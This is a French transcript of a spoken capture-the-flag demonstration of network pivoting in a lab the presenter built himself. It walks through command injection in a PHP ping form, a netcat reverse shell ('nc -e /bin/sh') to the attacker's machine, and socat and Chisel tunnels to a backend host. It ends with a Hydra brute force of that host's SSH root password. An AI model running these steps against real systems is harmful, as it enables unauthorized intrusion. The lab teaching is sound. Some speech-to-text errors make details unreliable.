Donc rebonjour à tous ceux qui n'étaient pas là tout à l'heure. Donc aujourd'hui en fait on va voir le principe du pivoting. Donc j'ai préparé ça avec deux machines, donc sous la forme en fait d'un CTF. Ici on a une première machine qu'on peut attaquer via un serveur Apache sur lequel en fait on a simplement un formulaire qui nous demande d'entrer l'adresse IP d'un hôte à pinguer. Et du coup si je mets une simple adresse IP au hasard, j'ai bien une réponse d'un ping. Donc derrière, en fait, la page PHP exécute une commande. Et en fait, on va essayer d'utiliser cette fonction pour exécuter une autre commande. Ici, par exemple, si je mets un point virgule ls, eh bien, on va voir que ici, ça affiche bien le contenu du répertoire. Donc, on a réussi à exécuter du code arbitraire directement via notre page PHP. On peut faire un cat/etc passwd aussi pour récupérer la liste des utilisateurs sur la machine. Et nous, ce qui va nous intéresser ici, c'est d'avoir un reverse shell. Donc, je vais lancer sur ma machine un PowerShell. Je récupère mon adresse IP locale, qui est ici 52.194. Je vais me déplacer à la racine de ces deux points. J'ai déjà donc téléchargé le binaire compilé de Netcat pour Windows. Et je vais lancer un Netcat, donc moins NLVP sur le port 4444. Pour lancer donc un listener Netcat, je vais retourner sur ma machine vulnérable. Je remets un 1.1.1.1, point virgule, nc-e/bin/sh. J'envoie la connexion sur mon adresse sur le port 4444. Et ici, donc, je récupère bien une connexion à reverse shell en tant que route. Donc là, on est en tant que route, c'est par choix. C'est simplement, normalement, je devrais avoir un shell en tant que 3W data ou en tant que HTTPD. C'est simplement que ici, j'ai compilé Apache from scratch depuis les sources avec un flag que j'ai paramétré pour qu'il se lance, que le service soit lancé en tant que route, tout simplement parce que on avait trop peu de temps pour montrer la privilege escalation en même temps que le pivoting. Donc, à l'intérieur de ce reverse shell, je vais l'augmenter un petit peu. Je vais utiliser mon blog que j'utilise régulièrement en fait pour faire des CTF et sur lequel j'ai une page dédiée en fait aux outils. Voilà toutes les petites commandes qui peuvent servir. Et ici, je vais pouvoir augmenter mon shell avec user bin script. Et de cette façon-là, je vais pouvoir avoir un shell complet avec le nom de l'utilisateur, le hostname de la machine et le PWD, donc l'endroit où je me trouve. La première chose qu'on peut faire, c'est un IPA pour voir les interfaces de la machine. On retrouve bien notre interface avec l'adresse 52.187 sur laquelle on a attaqué la machine. Et ce qui va nous interroger tout de suite, c'est cette adresse en 10.8.6.1. Et donc, ça veut dire que la machine, elle a une patte dans un deuxième réseau. Et donc, on va essayer d'aller scanner ce sous-réseau pour voir s'il y a d'autres machines disponibles. Donc, pour cela, je vais utiliser Nmap. Donc, je vais regarder déjà si Nmap est disponible sur notre machine. Donc là, il n'y a pas de réponse. Donc, c'est que Nmap n'est pas reconnu, n'est pas installé sur la machine. Je vais essayer de faire un ping sur une adresse sur Internet. Donc là, le DNS de Cloudflare. Je vois que j'ai bien une réponse. Donc, ma machine est bien connectée à Internet. Donc, je vais pouvoir faire un apt update, un apt install nmap -y pour garder la main dans notre reverse shell. Donc ça va installer directement le paquet nmap dans notre machine via notre reverse shell. Et ensuite, je vais pouvoir donc utiliser le binaire de nmap pour scanner ce sous-réseau en 10.8.6.0. Donc, une fois que le paquet est installé, j'attends encore quelques secondes. Voilà. À partir de là, je peux faire un nmap -sp, on va faire un simple ping sur donc 10.8.6.0/24 pour scanner en fait l'entièreté du sous-réseau en 10.8.6.0, donc de 1 à 254. Et je vais très certainement donc trouver une machine, voilà, ici en 10.8.6.14. Si je fais un ping -c2 sur cette adresse-là, on voit que ça répond. Donc on a bien un hôte qui est présent sur cette adresse-là. Donc je vais le scanner à son tour avec un nmap -A pour scanner les ports ouverts sur la machine et avoir une résolution des services qui s'y trouvent et des numéros de version. Donc je vais attendre quelques secondes, je peux appuyer sur Entrée pour avoir l'évolution du scan.
Donc ici, on voit que sur notre machine, on a simplement un port 22 d'ouvert, donc un SSH. Et donc ce SSH, le but, ça va être de rentrer dessus. Mais là, on ne connaît pas encore le mot de passe. Et donc pour connaître le mot de passe de cette machine-là, on va faire ce qu'on appelle du pivoting. C'est-à-dire qu'à partir de notre machine sur laquelle on a un reverse shell, on va créer un tunnel de connexion qui va nous permettre, depuis notre propre machine, d'accéder à cette machine qui se trouve en 18.6.14. Pour ça, on va utiliser deux outils. On va en utiliser un premier qui sera le plus simple possible et un deuxième qui sera le plus puissant. Le plus simple, donc comme l'a dit Kira tout à l'heure, ça va être SOCAT. On peut refaire un witch SOCAT pour voir s'il est installé sur notre machine. Comme Nmap, on n'a pas de paquet de binaire SOCAT installé, donc on va refaire un apt install SOCAT-y pour l'installer directement sur notre machine. Et ensuite, on peut faire un SOCAT TCP4 listen. On va spécifier le port sur lequel on veut écouter. Donc ici, on va choisir 1, 2, 3, 4. Fork pour forker le process. Ça, c'est indispensable puisque à la première connexion sur le port 1, 2, 3, 4, la connexion va être coupée. Alors que si je mets un fork, il va ce qu'on appelle forker le process. Donc, il va reprendre une deuxième fois le processus. Il va remettre en place notre tunnel. Et ensuite, donc, TCP4 suivi de l'adresse et du port que l'on veut attaquer. Donc, chez nous, 10, 8, 6, 14 sur le port 22. Et je viens à FRLuet pour récupérer la main dans notre reverse shell. Donc là, on voit bien que on a notre tunnel SOCAT qui a été monté. Donc si maintenant, je vais sur notre machine avec son adresse en 52, je crois que tout à l'heure c'était 187, oui c'est ça, sur le port 1, 2, 3, 4, ici on a une demande d'échange de clés, et donc on arrive bien en fait sur le serveur SSH de notre machine en 18.6.14, en passant par notre machine en 52.187. Et donc, maintenant, on va voir comment attaquer directement notre machine en 18.6.14 avec un Hydra pour brute forcer le mot de passe. Et donc, pour ça, on va voir un outil un peu plus puissant qui s'appelle Chisel. Donc, Chisel, il y a un GitHub qui existe pour Chisel. C'est un outil qui est très bien fait et qui permet de créer des tunnels à la volée. Et l'intérêt de Chisel, c'est que c'est un auto-exécutable. C'est un binaire, donc on a juste à le déposer sur la machine et à partir de là, on peut l'utiliser. Donc je vais faire un wget pour télécharger le fichier. Ici, on voit qu'on a notre fichier Chisel qui a été téléchargé. Je vais faire un gunzip pour le décompresser. Et ensuite, je vais le renommer tout de suite en Chisel, ce sera plus simple. Sur mv Chisel, ls.l. Ici, on voit qu'on a notre binaire Chisel, mais il n'est pas exécutable. Donc je vais le rendre exécutable avec un chmod plus x. Et donc ça va se passer en deux étapes. Je vais avoir besoin d'une partie serveur et d'une partie cliente. Pour la partie serveur, je vais rouvrir un nouveau PowerShell. Je vais me déplacer à nouveau à la racine de C. Et j'ai également un Chisel qui se trouve ici. Et je vais le lancer en tant que serveur sur le port 8080 avec l'option ---- reverse. Je vais démarrer sur le port 8080 une version serveur de Chisel. Et donc, à partir de là, je peux utiliser Chisel en mode client via mon reverse shell. Je vais me connecter sur 52.194, qui est donc ma machine ici, mon hôte, sur le port 8080. Et je vais lui dire de reverser la connexion de 10, 8, 6, 14 sur le port 22. Ici, si je reprends mon Chisel directement ici, on voit qu'on a une session qui s'est ouverte. Donc en fait, ça fonctionne comme un proxy, c'est-à-dire que je peux avoir plusieurs connexions qui arrivent donc sur mon port 8080 et je vais pouvoir rediriger le trafic vers ma machine en reverse qui elle-même va rediriger vers la machine en 18.6.14. Sur ma machine, j'ai un Kali en WSL2 et donc si je l'ouvre, je vais faire un IP route pour avoir ma default gateway, donc ma passerelle par défaut, qui est en fait l'adresse IP de mon hôte Windows. Donc si je fais un ping, évidemment, ça répond. Et donc, je vais pouvoir faire un SSH, par exemple, de route
sur 52, pardon, pas l'adresse 152, sur l'adresse de ma gateway, sur le port 8080. Alors, j'ai dû me tromper quelque part. C'était sur le port 22, pardon. Tac, je le reprends juste ici. Sur le port 22, voilà. Et ici, donc, ça nous demande le mot de passe de l'adresse en 18.6.14. Donc, à partir de là, je peux faire un hydra -l, suivi du nom de l'admin, -p, donc j'ai la word list RockU, et spécifier mon adresse, alors celle de la gateway toujours, et je vais spécifier qu'on est sur du SSH. Et ici, ça va brute forcer le mot de passe. Donc là, on voit que le mot de passe n'était pas compliqué, c'était password. Et donc, si je refais un SSH root at l'adresse IP de ma gateway, donc 172.25.48.1, le mot de passe est password. Et si je fais un IPA, on voit que je suis bien sur 18.6.14. Donc en fait, pour illustrer ce que je viens de faire, ici, dans un premier temps, on a fait un pivot simple avec Socat. Donc on a réussi à accéder au Debian backend, donc la machine à gauche, qui contient donc un port SSH, en passant par Debian frontend. Et ensuite, on a fait un double pivot, donc avec Chisel, qui fonctionne comme un proxy. C'est-à-dire qu'à la place de mon Kali, je peux avoir plusieurs autres qui viennent se connecter. Et donc, on a passé 3 networks, donc de mon Kali vers mon hôte Windows, vers le Debian frontend, puis ensuite vers le Debian backend. Donc, on a rebondi 2 fois pour accéder à notre site. Voilà, c'était tout pour aujourd'hui. Je ne sais pas si vous avez des questions.